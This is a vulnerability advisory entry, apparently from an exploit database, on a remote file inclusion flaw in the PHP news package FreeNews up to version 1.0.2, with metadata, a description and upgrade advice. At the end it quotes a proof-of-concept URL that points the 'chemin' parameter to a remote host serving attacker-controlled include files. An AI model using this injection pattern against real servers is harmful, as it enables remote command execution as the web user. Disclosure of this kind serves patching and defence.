FreeNews Arbitrary File Inclusion Vulnerability

vendor:

FreeNews

by:

SecurityFocus

7.5

CVSS

HIGH

Arbitrary File Inclusion

CWE

Product Name: FreeNews

Affected Version From: 1

Affected Version To: 1.0.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:freenews:freenews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix and Linux

2002

FreeNews Arbitrary File Inclusion Vulnerability

FreeNews is a freely available, open source News software package written in PHP, and designed for use on Unix and Linux operating systems. Programming errors in FreeNews could lead to the inclusion of arbitrary files on remote servers in the web application. It is possible for a remote user to place commands in these include files that could result in execution on the local host, making remote arbitrary command execution as the web user possible.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of FreeNews.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6258/info

FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems.

Programming errors in FreeNews could lead to the inclusion of arbitrary files on remote servers in the web application. It is possible for a remote user to place commands in these include files that could result in execution on the local host. This would make remote arbitrary command execution as the web user possible. 

http://example.com/aff_news.php?chemin=http://example.org/include with
http://example.org/config.php
http://example.org/options.inc.php
http://example.org/freenews_functions.inc.php